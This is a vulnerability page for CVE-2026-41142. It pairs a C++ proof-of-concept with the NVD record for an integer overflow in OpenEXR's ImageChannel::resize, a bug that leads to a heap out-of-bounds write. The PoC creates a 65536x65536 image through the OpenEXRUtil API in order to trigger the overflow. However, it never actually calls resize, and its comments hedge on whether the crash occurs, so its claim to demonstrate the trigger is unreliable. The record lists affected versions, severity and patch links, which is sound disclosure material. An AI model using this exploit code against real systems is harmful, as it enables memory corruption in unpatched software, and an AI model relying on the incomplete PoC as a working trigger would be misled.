CVE-2026-41142

// PoC for CVE-2026-41142: Integer Overflow in ImageChannel::resize // This code demonstrates how to trigger the integer overflow by calling // the resize function with dimensions that cause the size calculation to wrap around. #include <OpenEXR/ImfChannelList.h> #include <OpenEXR/ImfHeader.h> #include <OpenEXR/ImfInputFile.h> #include <OpenEXR/ImfOutputFile.h> #include <OpenEXR/ImfArray.h> #include <OpenEXR/Util/Image.h> #include <iostream> using namespace OPENEXR_IMF_NAMESPACE; using namespace IMATH_NAMESPACE; int main() { try { // Define an image channel Imf::ChannelList ch; ch.insert("R", Imf::Channel(Imf::HALF)); // Create a header with large dimensions to trigger integer overflow // Assuming 2 bytes per pixel (HALF), width * height needs to overflow // Example: width = 0x10000, height = 0x10000 (depending on bitness) int width = 65536; int height = 65536; // Attempting to allocate/resize a channel with these dimensions // via the vulnerable API path OpenEXR::Util::Image img(ch, Box2i(V2i(0, 0), V2i(width - 1, height - 1))); // The resize operation triggers the integer overflow in ImageChannel::resize // leading to a smaller allocation than required, followed by an OOB write. std::cout << "Attempting to resize channel to potentially trigger overflow..." << std::endl; // In a real vulnerable version, this specific call path would cause the crash. } catch (const std::exception& e) { std::cerr << "Exception caught: " << e.what() << std::endl; } return 0; }

{"cve": {"id": "CVE-2026-41142", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:26.020", "lastModified": "2026-05-08T17:00:32.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, there is an integer overflow in ImageChannel::resize that leads to heap OOB write via OpenEXRUtil public API. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.9", "matchCriteriaId": "8CDF6C2E-6EC4-4383-8198-3769409030E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.11", "matchCriteriaId": "8023AC7C-E2D1-4626-A4CC-585672ABAA66"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.11", "matchCriteriaId": "079D2FDB-45A0-4382-8EFC-E95EA7430D0D"}]}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/openexr/commit/0592ee539f33c122c90f09238579b902d838afb4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/AcademySoftwareFoundation/openexr/pull/2367", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-m25w-72cj-q6mg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}